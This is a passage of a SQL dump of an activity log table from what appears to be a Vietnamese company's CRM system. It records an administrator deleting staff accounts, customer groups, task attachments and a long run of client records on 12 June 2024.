(11808, 'Staff Member Deleted [Name: Cong Ho, Data Transferred To: Admin WIT]', '2024-06-12 16:30:21', 'Admin WIT'),
(11809, 'Staff Member Deleted [Name: Tổ chức đào tạo WIT Sale, Data Transferred To: Admin WIT]', '2024-06-12 16:30:28', 'Admin WIT'),
(11810, 'Staff Member Deleted [Name: Tổ chức đào tạo WIT VN, Data Transferred To: Admin WIT]', '2024-06-12 16:30:33', 'Admin WIT'),
(11811, 'Staff Member Deleted [Name: Kế Toán Bán Hàng, Data Transferred To: Admin WIT]', '2024-06-12 16:30:40', 'Admin WIT'),
(11812, 'Staff Member Deleted [Name: Kiem Phi Ho, Data Transferred To: Admin WIT]', '2024-06-12 16:30:45', 'Admin WIT'),
(11813, 'Staff Member Deleted [Name: Kỹ Thuật HGP | Tổ chức đào tạo WIT, Data Transferred To: Admin WIT]', '2024-06-12 16:30:50', 'Admin WIT'),
(11814, 'Contract Type Updated [Hợp đồng thành viên mới, ID:2]', '2024-06-12 16:33:00', 'Admin WIT'),
(11815, 'Staff Member Deleted [Name: Loan Nguyễn, Data Transferred To: Admin WIT]', '2024-06-12 16:33:24', 'Admin WIT'),
(11816, 'Staff Member Deleted [Name: Phước Nghĩa Trương , Data Transferred To: Admin WIT]', '2024-06-12 16:33:36', 'Admin WIT'),
(11817, 'Staff Member Deleted [Name: Tâm Nguyen Thanh, Data Transferred To: Admin WIT]', '2024-06-12 16:33:43', 'Admin WIT'),
(11818, 'Estimate Request Form Deleted [2]', '2024-06-12 16:34:36', 'Admin WIT'),
(11819, 'Customer Group Deleted [ID:3]', '2024-06-12 16:34:48', 'Admin WIT'),
(11820, 'Customer Group Deleted [ID:4]', '2024-06-12 16:34:54', 'Admin WIT'),
(11821, 'Customer Group Updated [ID:2]', '2024-06-12 16:35:05', 'Admin WIT'),
(11822, 'Customer Group Updated [ID:1]', '2024-06-12 16:35:16', 'Admin WIT'),
(11823, 'Task Attachment Deleted [TaskID: 152]', '2024-06-12 16:36:20', 'Admin WIT'),
(11824, 'Task Attachment Deleted [TaskID: 40]', '2024-06-12 16:37:48', 'Admin WIT'),
(11825, 'Task Attachment Deleted [TaskID: 82]', '2024-06-12 16:38:04', 'Admin WIT'),
(11826, 'Task Attachment Deleted [TaskID: 103]', '2024-06-12 16:38:04', 'Admin WIT'),
(11827, 'Task Attachment Deleted [TaskID: 105]', '2024-06-12 16:38:04', 'Admin WIT'),
(11828, 'Task Attachment Deleted [TaskID: 142]', '2024-06-12 16:38:04', 'Admin WIT'),
(11829, 'Task Attachment Deleted [TaskID: 154]', '2024-06-12 16:38:04', 'Admin WIT'),
(11830, 'Task Attachment Deleted [TaskID: 164]', '2024-06-12 16:38:04', 'Admin WIT'),
(11831, 'Task Attachment Deleted [TaskID: 168]', '2024-06-12 16:38:28', 'Admin WIT'),
(11832, 'Task Attachment Deleted [TaskID: 168]', '2024-06-12 16:38:28', 'Admin WIT'),
(11833, 'Task Updated [ID:169, Name: Setup sự kiện nhà hát thành phố HCM]', '2024-06-12 16:39:25', 'Admin WIT'),
(11834, 'Client Deleted [ID: 1442]', '2024-06-12 16:40:58', 'Admin WIT'),
(11835, 'Client Deleted [ID: 1441]', '2024-06-12 16:40:58', 'Admin WIT'),
(11836, 'Client Deleted [ID: 1431]', '2024-06-12 16:40:58', 'Admin WIT'),
(11837, 'Client Deleted [ID: 1423]', '2024-06-12 16:40:58', 'Admin WIT'),
(11838, 'Client Deleted [ID: 1422]', '2024-06-12 16:40:58', 'Admin WIT'),
(11840, 'Client Deleted [ID: 1416]', '2024-06-12 16:40:58', 'Admin WIT'),
(11842, 'Client Deleted [ID: 1414]', '2024-06-12 16:40:58', 'Admin WIT'),
(11844, 'Client Deleted [ID: 1406]', '2024-06-12 16:40:58', 'Admin WIT'),
(11845, 'Client Deleted [ID: 1405]', '2024-06-12 16:40:58', 'Admin WIT'),
(11847, 'Client Deleted [ID: 1403]', '2024-06-12 16:40:58', 'Admin WIT'),
(11848, 'Client Deleted [ID: 1399]', '2024-06-12 16:40:58', 'Admin WIT'),
(11849, 'Client Deleted [ID: 1398]', '2024-06-12 16:40:58', 'Admin WIT'),
(11856, 'Client Deleted [ID: 1394]', '2024-06-12 16:40:58', 'Admin WIT'),
(11857, 'Client Deleted [ID: 1384]', '2024-06-12 16:40:58', 'Admin WIT'),
(11858, 'Client Deleted [ID: 1383]', '2024-06-12 16:40:58', 'Admin WIT'),
(11859, 'Client Deleted [ID: 1382]', '2024-06-12 16:40:58', 'Admin WIT'),
(11861, 'Client Deleted [ID: 1366]', '2024-06-12 16:40:59', 'Admin WIT'),
(11862, 'Client Deleted [ID: 1365]', '2024-06-12 16:40:59', 'Admin WIT'),
(11863, 'Client Deleted [ID: 1350]', '2024-06-12 16:40:59', 'Admin WIT'),
(11864, 'Client Deleted [ID: 1340]', '2024-06-12 16:41:12', 'Admin WIT'),
(11866, 'Client Deleted [ID: 1339]', '2024-06-12 16:41:12', 'Admin WIT'),
(11869, 'Client Deleted [ID: 1338]', '2024-06-12 16:41:12', 'Admin WIT'),
(11871, 'Client Deleted [ID: 1337]', '2024-06-12 16:41:12', 'Admin WIT'),
(11873, 'Client Deleted [ID: 1336]', '2024-06-12 16:41:12', 'Admin WIT'),
(11879, 'Client Deleted [ID: 1331]', '2024-06-12 16:41:12', 'Admin WIT'),
(11880, 'Client Deleted [ID: 1329]', '2024-06-12 16:41:12', 'Admin WIT'),
(11881, 'Client Deleted [ID: 1328]', '2024-06-12 16:41:12', 'Admin WIT'),
(11882, 'Client Deleted [ID: 1327]', '2024-06-12 16:41:12', 'Admin WIT'),
(11883, 'Client Deleted [ID: 1326]', '2024-06-12 16:41:12', 'Admin WIT'),
(11884, 'Client Deleted [ID: 1325]', '2024-06-12 16:41:12', 'Admin WIT'),
(11885, 'Client Deleted [ID: 1324]', '2024-06-12 16:43:29', 'Admin WIT'),
(11886, 'Client Deleted [ID: 1323]', '2024-06-12 16:43:29', 'Admin WIT'),
(11887, 'Client Deleted [ID: 1322]', '2024-06-12 16:43:29', 'Admin WIT'),
(11888, 'Client Deleted [ID: 1319]', '2024-06-12 16:43:29', 'Admin WIT'),
(11889, 'Client Deleted [ID: 1318]', '2024-06-12 16:43:29', 'Admin WIT'),
(11890, 'Client Deleted [ID: 1317]', '2024-06-12 16:43:29', 'Admin WIT'),
(11892, 'Client Deleted [ID: 1316]', '2024-06-12 16:43:29', 'Admin WIT'),
(11893, 'Client Deleted [ID: 1314]', '2024-06-12 16:43:29', 'Admin WIT'),
(11894, 'Client Deleted [ID: 1309]', '2024-06-12 16:43:29', 'Admin WIT'),
(11895, 'Client Deleted [ID: 1305]', '2024-06-12 16:43:29', 'Admin WIT'),
(11896, 'Client Deleted [ID: 1301]', '2024-06-12 16:43:29', 'Admin WIT'),
(11897, 'Client Deleted [ID: 1298]', '2024-06-12 16:43:29', 'Admin WIT'),
(11898, 'Client Deleted [ID: 1276]', '2024-06-12 16:43:29', 'Admin WIT'),
(11899, 'Client Deleted [ID: 1275]', '2024-06-12 16:43:30', 'Admin WIT'),
(11901, 'Client Deleted [ID: 1260]', '2024-06-12 16:43:30', 'Admin WIT'),
(11902, 'Client Deleted [ID: 1250]', '2024-06-12 16:43:30', 'Admin WIT'),
(11903, 'Client Deleted [ID: 1248]', '2024-06-12 16:43:30', 'Admin WIT'),
(11904, 'Client Deleted [ID: 1245]', '2024-06-12 16:43:30', 'Admin WIT'),
(11905, 'Client Deleted [ID: 1243]', '2024-06-12 16:43:30', 'Admin WIT'),
(11906, 'Client Deleted [ID: 1239]', '2024-06-12 16:43:30', 'Admin WIT'),
(11907, 'Client Deleted [ID: 1221]', '2024-06-12 16:43:30', 'Admin WIT'),
(11909, 'Client Deleted [ID: 1199]', '2024-06-12 16:43:30', 'Admin WIT'),
(11911, 'Client Deleted [ID: 1198]', '2024-06-12 16:43:30', 'Admin WIT'),
(11912, 'Client Deleted [ID: 1190]', '2024-06-12 16:43:30', 'Admin WIT'),
(11913, 'Client Deleted [ID: 1189]', '2024-06-12 16:43:30', 'Admin WIT'),
(11914, 'Client Deleted [ID: 1188]', '2024-06-12 16:43:30', 'Admin WIT'),
(11915, 'Client Deleted [ID: 1187]', '2024-06-12 16:43:30', 'Admin WIT'),
(11916, 'Client Deleted [ID: 1186]', '2024-06-12 16:43:30', 'Admin WIT'),
(11917, 'Client Deleted [ID: 1185]', '2024-06-12 16:43:30', 'Admin WIT'),
(11918, 'Client Deleted [ID: 1184]', '2024-06-12 16:43:30', 'Admin WIT'),
(11919, 'Client Deleted [ID: 1183]', '2024-06-12 16:43:30', 'Admin WIT'),
(11920, 'Client Deleted [ID: 1182]', '2024-06-12 16:43:30', 'Admin WIT'),
(11921, 'Client Deleted [ID: 1181]', '2024-06-12 16:43:30', 'Admin WIT'),
(11922, 'Client Deleted [ID: 1180]', '2024-06-12 16:43:30', 'Admin WIT'),
(11923, 'Client Deleted [ID: 1179]', '2024-06-12 16:43:30', 'Admin WIT'),
(11924, 'Client Deleted [ID: 1178]', '2024-06-12 16:43:30', 'Admin WIT'),
(11925, 'Client Deleted [ID: 1177]', '2024-06-12 16:43:30', 'Admin WIT'),
(11926, 'Client Deleted [ID: 1176]', '2024-06-12 16:43:30', 'Admin WIT'),
(11927, 'Client Deleted [ID: 1175]', '2024-06-12 16:43:30', 'Admin WIT'),
(11928, 'Client Deleted [ID: 1174]', '2024-06-12 16:43:30', 'Admin WIT'),
(11929, 'Client Deleted [ID: 1173]', '2024-06-12 16:43:30', 'Admin WIT'),
(11930, 'Client Deleted [ID: 1172]', '2024-06-12 16:43:30', 'Admin WIT'),
(11931, 'Client Deleted [ID: 1171]', '2024-06-12 16:43:30', 'Admin WIT'),
(11932, 'Client Deleted [ID: 1170]', '2024-06-12 16:43:30', 'Admin WIT'),
(11933, 'Client Deleted [ID: 1169]', '2024-06-12 16:43:30', 'Admin WIT'),
(11934, 'Client Deleted [ID: 1168]', '2024-06-12 16:43:30', 'Admin WIT'),
(11935, 'Client Deleted [ID: 1167]', '2024-06-12 16:43:30', 'Admin WIT'),
(11936, 'Client Deleted [ID: 1166]', '2024-06-12 16:43:30', 'Admin WIT'),
(11937, 'Client Deleted [ID: 1165]', '2024-06-12 16:43:30', 'Admin WIT'),
(11938, 'Client Deleted [ID: 1164]', '2024-06-12 16:43:30', 'Admin WIT'),
(11939, 'Client Deleted [ID: 1163]', '2024-06-12 16:43:30', 'Admin WIT'),
(11940, 'Client Deleted [ID: 1162]', '2024-06-12 16:43:30', 'Admin WIT'),
(11941, 'Client Deleted [ID: 1161]', '2024-06-12 16:43:30', 'Admin WIT'),
(11942, 'Client Deleted [ID: 1160]', '2024-06-12 16:43:30', 'Admin WIT'),
(11943, 'Client Deleted [ID: 1159]', '2024-06-12 16:43:30', 'Admin WIT'),
(11944, 'Client Deleted [ID: 1158]', '2024-06-12 16:43:30', 'Admin WIT'),
(11945, 'Client Deleted [ID: 1157]', '2024-06-12 16:43:30', 'Admin WIT'),
(11946, 'Client Deleted [ID: 1156]', '2024-06-12 16:43:30', 'Admin WIT'),
(11947, 'Client Deleted [ID: 1155]', '2024-06-12 16:43:31', 'Admin WIT'),
(11948, 'Client Deleted [ID: 1154]', '2024-06-12 16:43:31', 'Admin WIT'),
(11949, 'Client Deleted [ID: 1153]', '2024-06-12 16:43:31', 'Admin WIT'),
(11950, 'Client Deleted [ID: 1152]', '2024-06-12 16:43:31', 'Admin WIT'),
(11951, 'Client Deleted [ID: 1151]', '2024-06-12 16:43:31', 'Admin WIT'),
(11952, 'Client Deleted [ID: 1150]', '2024-06-12 16:43:31', 'Admin WIT'),
(11953, 'Client Deleted [ID: 1149]', '2024-06-12 16:43:31', 'Admin WIT'),
(11954, 'Client Deleted [ID: 1148]', '2024-06-12 16:43:31', 'Admin WIT'),
(11955, 'Client Deleted [ID: 1147]', '2024-06-12 16:43:31', 'Admin WIT'),
(11956, 'Client Deleted [ID: 1146]', '2024-06-12 16:43:31', 'Admin WIT'),
(11957, 'Client Deleted [ID: 1145]', '2024-06-12 16:43:31', 'Admin WIT'),
(11958, 'Client Deleted [ID: 1144]', '2024-06-12 16:43:31', 'Admin WIT'),
(11959, 'Client Deleted [ID: 1143]', '2024-06-12 16:43:31', 'Admin WIT'),
(11960, 'Client Deleted [ID: 1142]', '2024-06-12 16:43:31', 'Admin WIT'),
(11961, 'Client Deleted [ID: 1141]', '2024-06-12 16:43:31', 'Admin WIT'),
(11962, 'Client Deleted [ID: 1140]', '2024-06-12 16:43:31', 'Admin WIT'),
(11963, 'Client Deleted [ID: 1139]', '2024-06-12 16:43:31', 'Admin WIT'),
(11964, 'Client Deleted [ID: 1138]', '2024-06-12 16:43:31', 'Admin WIT'),
(11965, 'Client Deleted [ID: 1137]', '2024-06-12 16:43:31', 'Admin WIT'),
(11966, 'Client Deleted [ID: 1136]', '2024-06-12 16:43:31', 'Admin WIT'),
(11967, 'Client Deleted [ID: 1135]', '2024-06-12 16:43:31', 'Admin WIT'),
(11968, 'Client Deleted [ID: 1134]', '2024-06-12 16:43:31', 'Admin WIT'),
(11969, 'Client Deleted [ID: 1133]', '2024-06-12 16:43:31', 'Admin WIT'),
(11970, 'Client Deleted [ID: 1132]', '2024-06-12 16:43:31', 'Admin WIT'),
(11971, 'Client Deleted [ID: 1131]', '2024-06-12 16:43:31', 'Admin WIT'),
(11972, 'Client Deleted [ID: 1130]', '2024-06-12 16:43:31', 'Admin WIT'),
(11973, 'Client Deleted [ID: 1129]', '2024-06-12 16:43:31', 'Admin WIT'),
(11974, 'Client Deleted [ID: 1128]', '2024-06-12 16:43:31', 'Admin WIT'),
(11975, 'Client Deleted [ID: 1127]', '2024-06-12 16:43:31', 'Admin WIT'),
(11976, 'Client Deleted [ID: 1126]', '2024-06-12 16:43:31', 'Admin WIT'),
(11977, 'Client Deleted [ID: 1125]', '2024-06-12 16:43:31', 'Admin WIT'),
(11978, 'Client Deleted [ID: 1124]', '2024-06-12 16:43:31', 'Admin WIT'),
(11979, 'Client Deleted [ID: 1123]', '2024-06-12 16:43:31', 'Admin WIT'),
(11980, 'Client Deleted [ID: 1122]', '2024-06-12 16:43:31', 'Admin WIT'),
(11981, 'Client Deleted [ID: 1121]', '2024-06-12 16:43:31', 'Admin WIT'),
(11982, 'Client Deleted [ID: 1120]', '2024-06-12 16:43:31', 'Admin WIT'),
(11983, 'Client Deleted [ID: 1119]', '2024-06-12 16:43:31', 'Admin WIT'),
(11984, 'Client Deleted [ID: 1118]', '2024-06-12 16:43:31', 'Admin WIT'),
(11985, 'Client Deleted [ID: 1117]', '2024-06-12 16:43:31', 'Admin WIT'),
(11986, 'Client Deleted [ID: 1116]', '2024-06-12 16:43:31', 'Admin WIT'),
(11987, 'Client Deleted [ID: 1115]', '2024-06-12 16:43:31', 'Admin WIT'),
(11988, 'Client Deleted [ID: 1114]', '2024-06-12 16:43:31', 'Admin WIT'),
(11989, 'Client Deleted [ID: 1113]', '2024-06-12 16:43:31', 'Admin WIT'),
(11990, 'Client Deleted [ID: 1112]', '2024-06-12 16:43:31', 'Admin WIT'),
(11991, 'Client Deleted [ID: 1111]', '2024-06-12 16:43:31', 'Admin WIT'),
(11992, 'Client Deleted [ID: 1110]', '2024-06-12 16:43:31', 'Admin WIT'),
(11993, 'Client Deleted [ID: 1109]', '2024-06-12 16:43:31', 'Admin WIT'),
(11994, 'Client Deleted [ID: 1108]', '2024-06-12 16:43:31', 'Admin WIT'),
(11995, 'Client Deleted [ID: 1107]', '2024-06-12 16:43:32', 'Admin WIT'),
(11996, 'Client Deleted [ID: 1106]', '2024-06-12 16:43:32', 'Admin WIT'),
(11997, 'Client Deleted [ID: 1105]', '2024-06-12 16:43:32', 'Admin WIT'),
(11998, 'Client Deleted [ID: 1104]', '2024-06-12 16:43:32', 'Admin WIT'),
(11999, 'Client Deleted [ID: 1103]', '2024-06-12 16:43:32', 'Admin WIT'),
(12000, 'Client Deleted [ID: 1102]', '2024-06-12 16:43:32', 'Admin WIT'),
(12001, 'Client Deleted [ID: 1101]', '2024-06-12 16:43:32', 'Admin WIT'),
(12002, 'Client Deleted [ID: 1100]', '2024-06-12 16:43:32', 'Admin WIT'),
(12003, 'Client Deleted [ID: 1099]', '2024-06-12 16:43:32', 'Admin WIT'),
(12004, 'Client Deleted [ID: 1098]', '2024-06-12 16:43:32', 'Admin WIT'),
(12005, 'Client Deleted [ID: 1097]', '2024-06-12 16:43:32', 'Admin WIT'),
(12006, 'Client Deleted [ID: 1096]', '2024-06-12 16:43:32', 'Admin WIT'),
(12007, 'Client Deleted [ID: 1095]', '2024-06-12 16:43:32', 'Admin WIT'),
(12008, 'Client Deleted [ID: 1094]', '2024-06-12 16:43:32', 'Admin WIT'),
(12009, 'Client Deleted [ID: 1093]', '2024-06-12 16:43:32', 'Admin WIT'),
(12010, 'Client Deleted [ID: 1092]', '2024-06-12 16:43:32', 'Admin WIT'),
(12011, 'Client Deleted [ID: 1091]', '2024-06-12 16:43:32', 'Admin WIT'),
(12012, 'Client Deleted [ID: 1090]', '2024-06-12 16:43:32', 'Admin WIT'),
(12013, 'Client Deleted [ID: 1089]', '2024-06-12 16:43:32', 'Admin WIT'),
(12014, 'Client Deleted [ID: 1088]', '2024-06-12 16:43:32', 'Admin WIT'),
(12015, 'Client Deleted [ID: 1087]', '2024-06-12 16:43:32', 'Admin WIT'),
(12016, 'Client Deleted [ID: 1086]', '2024-06-12 16:43:32', 'Admin WIT'),
(12017, 'Client Deleted [ID: 1085]', '2024-06-12 16:43:32', 'Admin WIT'),
(12018, 'Client Deleted [ID: 1084]', '2024-06-12 16:43:32', 'Admin WIT'),
(12019, 'Client Deleted [ID: 1083]', '2024-06-12 16:43:32', 'Admin WIT'),
(12020, 'Client Deleted [ID: 1082]', '2024-06-12 16:43:32', 'Admin WIT'),
(12021, 'Client Deleted [ID: 1081]', '2024-06-12 16:43:32', 'Admin WIT'),
(12022, 'Client Deleted [ID: 1080]', '2024-06-12 16:43:32', 'Admin WIT'),
(12023, 'Client Deleted [ID: 1079]', '2024-06-12 16:43:32', 'Admin WIT'),
(12024, 'Client Deleted [ID: 1078]', '2024-06-12 16:43:32', 'Admin WIT'),
(12025, 'Client Deleted [ID: 1077]', '2024-06-12 16:43:32', 'Admin WIT'),
(12026, 'Client Deleted [ID: 1076]', '2024-06-12 16:43:32', 'Admin WIT'),
(12027, 'Client Deleted [ID: 1075]', '2024-06-12 16:43:32', 'Admin WIT'),
(12028, 'Client Deleted [ID: 1074]', '2024-06-12 16:43:32', 'Admin WIT'),
(12029, 'Client Deleted [ID: 1073]', '2024-06-12 16:43:32', 'Admin WIT'),
(12030, 'Client Deleted [ID: 1072]', '2024-06-12 16:43:32', 'Admin WIT'),
(12031, 'Client Deleted [ID: 1071]', '2024-06-12 16:43:32', 'Admin WIT'),
(12032, 'Client Deleted [ID: 1070]', '2024-06-12 16:43:32', 'Admin WIT'),
(12033, 'Client Deleted [ID: 1069]', '2024-06-12 16:43:32', 'Admin WIT'),
(12034, 'Client Deleted [ID: 1068]', '2024-06-12 16:43:32', 'Admin WIT'),
(12035, 'Client Deleted [ID: 1067]', '2024-06-12 16:43:32', 'Admin WIT'),
(12036, 'Client Deleted [ID: 1066]', '2024-06-12 16:43:32', 'Admin WIT'),
(12037, 'Client Deleted [ID: 1065]', '2024-06-12 16:43:32', 'Admin WIT'),
(12038, 'Client Deleted [ID: 1064]', '2024-06-12 16:43:32', 'Admin WIT'),
(12039, 'Client Deleted [ID: 1063]', '2024-06-12 16:43:32', 'Admin WIT'),
(12040, 'Client Deleted [ID: 1062]', '2024-06-12 16:43:32', 'Admin WIT'),
(12041, 'Client Deleted [ID: 1061]', '2024-06-12 16:43:32', 'Admin WIT'),
(12042, 'Client Deleted [ID: 1060]', '2024-06-12 16:43:33', 'Admin WIT'),
(12043, 'Client Deleted [ID: 1059]', '2024-06-12 16:43:33', 'Admin WIT'),
(12044, 'Client Deleted [ID: 1058]', '2024-06-12 16:43:33', 'Admin WIT'),
(12045, 'Client Deleted [ID: 1057]', '2024-06-12 16:43:33', 'Admin WIT'),
(12046, 'Client Deleted [ID: 1056]', '2024-06-12 16:43:33', 'Admin WIT'),
(12047, 'Client Deleted [ID: 1055]', '2024-06-12 16:43:33', 'Admin WIT'),
(12048, 'Client Deleted [ID: 1054]', '2024-06-12 16:43:33', 'Admin WIT'),
(12049, 'Client Deleted [ID: 1053]', '2024-06-12 16:43:33', 'Admin WIT'),
(12050, 'Client Deleted [ID: 1052]', '2024-06-12 16:43:33', 'Admin WIT'),
(12051, 'Client Deleted [ID: 1051]', '2024-06-12 16:43:33', 'Admin WIT'),
(12052, 'Client Deleted [ID: 1050]', '2024-06-12 16:43:33', 'Admin WIT'),
(12053, 'Client Deleted [ID: 1049]', '2024-06-12 16:43:33', 'Admin WIT'),
(12054, 'Client Deleted [ID: 1048]', '2024-06-12 16:43:33', 'Admin WIT');
INSERT INTO `tblactivity_log` (`id`, `description`, `date`, `staffid`) VALUES
(12055, 'Client Deleted [ID: 1047]', '2024-06-12 16:43:33', 'Admin WIT'),
(12056, 'Client Deleted [ID: 1046]', '2024-06-12 16:43:33', 'Admin WIT'),
(12057, 'Client Deleted [ID: 1045]', '2024-06-12 16:43:33', 'Admin WIT'),
(12058, 'Client Deleted [ID: 1044]', '2024-06-12 16:43:33', 'Admin WIT'),
(12059, 'Client Deleted [ID: 1043]', '2024-06-12 16:43:33', 'Admin WIT'),
(12060, 'Client Deleted [ID: 1042]', '2024-06-12 16:43:33', 'Admin WIT'),
(12061, 'Client Deleted [ID: 1041]', '2024-06-12 16:43:33', 'Admin WIT'),
(12062, 'Client Deleted [ID: 1040]', '2024-06-12 16:43:33', 'Admin WIT'),
(12063, 'Client Deleted [ID: 1039]', '2024-06-12 16:43:33', 'Admin WIT'),
(12064, 'Client Deleted [ID: 1038]', '2024-06-12 16:43:33', 'Admin WIT'),
(12065, 'Client Deleted [ID: 1037]', '2024-06-12 16:43:33', 'Admin WIT'),
(12066, 'Client Deleted [ID: 1036]', '2024-06-12 16:43:33', 'Admin WIT'),
(12067, 'Client Deleted [ID: 1035]', '2024-06-12 16:43:33', 'Admin WIT'),
(12068, 'Client Deleted [ID: 1034]', '2024-06-12 16:43:33', 'Admin WIT'),
(12069, 'Client Deleted [ID: 1033]', '2024-06-12 16:43:33', 'Admin WIT'),
(12070, 'Client Deleted [ID: 1032]', '2024-06-12 16:43:33', 'Admin WIT'),
(12071, 'Client Deleted [ID: 1031]', '2024-06-12 16:43:33', 'Admin WIT'),
(12072, 'Client Deleted [ID: 1030]', '2024-06-12 16:43:33', 'Admin WIT'),
(12073, 'Client Deleted [ID: 1029]', '2024-06-12 16:43:33', 'Admin WIT'),
(12074, 'Client Deleted [ID: 1028]', '2024-06-12 16:43:33', 'Admin WIT'),
(12075, 'Client Deleted [ID: 1027]', '2024-06-12 16:43:33', 'Admin WIT'),
(12076, 'Client Deleted [ID: 1026]', '2024-06-12 16:43:33', 'Admin WIT'),
(12077, 'Client Deleted [ID: 1025]', '2024-06-12 16:43:33', 'Admin WIT'),
(12078, 'Client Deleted [ID: 1024]', '2024-06-12 16:43:33', 'Admin WIT'),
(12079, 'Client Deleted [ID: 1023]', '2024-06-12 16:43:33', 'Admin WIT'),
(12080, 'Client Deleted [ID: 1022]', '2024-06-12 16:43:33', 'Admin WIT'),
(12081, 'Client Deleted [ID: 1021]', '2024-06-12 16:43:33', 'Admin WIT'),
(12082, 'Client Deleted [ID: 1020]', '2024-06-12 16:43:33', 'Admin WIT'),
(12083, 'Client Deleted [ID: 1019]', '2024-06-12 16:43:33', 'Admin WIT'),
(12084, 'Client Deleted [ID: 1018]', '2024-06-12 16:43:33', 'Admin WIT'),
(12085, 'Client Deleted [ID: 1017]', '2024-06-12 16:43:33', 'Admin WIT'),
(12086, 'Client Deleted [ID: 1016]', '2024-06-12 16:43:33', 'Admin WIT'),
(12087, 'Client Deleted [ID: 1015]', '2024-06-12 16:43:33', 'Admin WIT'),
(12088, 'Client Deleted [ID: 1014]', '2024-06-12 16:43:33', 'Admin WIT'),
(12089, 'Client Deleted [ID: 1013]', '2024-06-12 16:43:33', 'Admin WIT'),
(12090, 'Client Deleted [ID: 1012]', '2024-06-12 16:43:33', 'Admin WIT'),
(12091, 'Client Deleted [ID: 1011]', '2024-06-12 16:43:34', 'Admin WIT'),
(12092, 'Client Deleted [ID: 1010]', '2024-06-12 16:43:34', 'Admin WIT'),
(12093, 'Client Deleted [ID: 1009]', '2024-06-12 16:43:34', 'Admin WIT'),
(12094, 'Client Deleted [ID: 1008]', '2024-06-12 16:43:34', 'Admin WIT'),
(12095, 'Client Deleted [ID: 1007]', '2024-06-12 16:43:34', 'Admin WIT'),
(12096, 'Client Deleted [ID: 1006]', '2024-06-12 16:43:34', 'Admin WIT'),
(12097, 'Client Deleted [ID: 1005]', '2024-06-12 16:43:34', 'Admin WIT'),
(12098, 'Client Deleted [ID: 1004]', '2024-06-12 16:43:34', 'Admin WIT'),
(12099, 'Client Deleted [ID: 1003]', '2024-06-12 16:43:34', 'Admin WIT'),
(12100, 'Client Deleted [ID: 1002]', '2024-06-12 16:43:34', 'Admin WIT'),
(12101, 'Client Deleted [ID: 1001]', '2024-06-12 16:43:34', 'Admin WIT'),
(12102, 'Client Deleted [ID: 1000]', '2024-06-12 16:43:34', 'Admin WIT'),
(12103, 'Client Deleted [ID: 999]', '2024-06-12 16:43:34', 'Admin WIT'),
(12104, 'Client Deleted [ID: 998]', '2024-06-12 16:43:34', 'Admin WIT'),
(12105, 'Client Deleted [ID: 997]', '2024-06-12 16:43:34', 'Admin WIT'),
(12106, 'Client Deleted [ID: 996]', '2024-06-12 16:43:34', 'Admin WIT'),
(12107, 'Client Deleted [ID: 995]', '2024-06-12 16:43:34', 'Admin WIT'),
(12108, 'Client Deleted [ID: 994]', '2024-06-12 16:43:34', 'Admin WIT'),
(12109, 'Client Deleted [ID: 993]', '2024-06-12 16:43:34', 'Admin WIT'),
(12110, 'Client Deleted [ID: 992]', '2024-06-12 16:43:34', 'Admin WIT'),
(12111, 'Client Deleted [ID: 991]', '2024-06-12 16:43:34', 'Admin WIT'),
(12112, 'Client Deleted [ID: 990]', '2024-06-12 16:43:34', 'Admin WIT'),
(12113, 'Client Deleted [ID: 989]', '2024-06-12 16:43:34', 'Admin WIT'),
(12114, 'Client Deleted [ID: 988]', '2024-06-12 16:43:34', 'Admin WIT'),
(12115, 'Client Deleted [ID: 987]', '2024-06-12 16:43:34', 'Admin WIT'),
(12116, 'Client Deleted [ID: 986]', '2024-06-12 16:43:34', 'Admin WIT'),
(12117, 'Client Deleted [ID: 985]', '2024-06-12 16:43:34', 'Admin WIT'),
(12118, 'Client Deleted [ID: 984]', '2024-06-12 16:43:34', 'Admin WIT'),
(12119, 'Client Deleted [ID: 983]', '2024-06-12 16:43:34', 'Admin WIT'),
(12120, 'Client Deleted [ID: 982]', '2024-06-12 16:43:34', 'Admin WIT'),
(12121, 'Client Deleted [ID: 981]', '2024-06-12 16:43:34', 'Admin WIT'),
(12122, 'Client Deleted [ID: 980]', '2024-06-12 16:43:34', 'Admin WIT'),
(12123, 'Client Deleted [ID: 979]', '2024-06-12 16:43:34', 'Admin WIT'),
(12124, 'Client Deleted [ID: 978]', '2024-06-12 16:43:34', 'Admin WIT'),
(12125, 'Client Deleted [ID: 977]', '2024-06-12 16:43:34', 'Admin WIT'),
(12126, 'Client Deleted [ID: 976]', '2024-06-12 16:43:34', 'Admin WIT'),
(12127, 'Client Deleted [ID: 975]', '2024-06-12 16:43:34', 'Admin WIT'),
(12128, 'Client Deleted [ID: 974]', '2024-06-12 16:43:34', 'Admin WIT'),
(12129, 'Client Deleted [ID: 973]', '2024-06-12 16:43:34', 'Admin WIT'),
(12130, 'Client Deleted [ID: 972]', '2024-06-12 16:43:34', 'Admin WIT'),
(12131, 'Client Deleted [ID: 971]', '2024-06-12 16:43:34', 'Admin WIT'),
(12132, 'Client Deleted [ID: 970]', '2024-06-12 16:43:34', 'Admin WIT'),
(12133, 'Client Deleted [ID: 969]', '2024-06-12 16:43:34', 'Admin WIT'),
(12134, 'Client Deleted [ID: 964]', '2024-06-12 16:43:34', 'Admin WIT'),
(12135, 'Client Deleted [ID: 963]', '2024-06-12 16:43:34', 'Admin WIT'),
(12136, 'Client Deleted [ID: 962]', '2024-06-12 16:43:34', 'Admin WIT'),
(12137, 'Client Deleted [ID: 961]', '2024-06-12 16:43:34', 'Admin WIT'),
(12138, 'Client Deleted [ID: 960]', '2024-06-12 16:43:35', 'Admin WIT'),
(12139, 'Client Deleted [ID: 959]', '2024-06-12 16:43:35', 'Admin WIT'),
(12140, 'Client Deleted [ID: 958]', '2024-06-12 16:43:35', 'Admin WIT'),
(12141, 'Client Deleted [ID: 957]', '2024-06-12 16:43:35', 'Admin WIT'),
(12142, 'Client Deleted [ID: 956]', '2024-06-12 16:43:35', 'Admin WIT'),
(12143, 'Client Deleted [ID: 955]', '2024-06-12 16:43:35', 'Admin WIT'),
(12144, 'Client Deleted [ID: 954]', '2024-06-12 16:43:35', 'Admin WIT'),
(12145, 'Client Deleted [ID: 953]', '2024-06-12 16:43:35', 'Admin WIT'),
(12146, 'Client Deleted [ID: 950]', '2024-06-12 16:43:35', 'Admin WIT'),
(12147, 'Client Deleted [ID: 941]', '2024-06-12 16:43:35', 'Admin WIT'),
(12148, 'Client Deleted [ID: 918]', '2024-06-12 16:43:35', 'Admin WIT'),
(12150, 'Client Deleted [ID: 917]', '2024-06-12 16:43:35', 'Admin WIT'),
(12152, 'Client Deleted [ID: 913]', '2024-06-12 16:43:35', 'Admin WIT'),
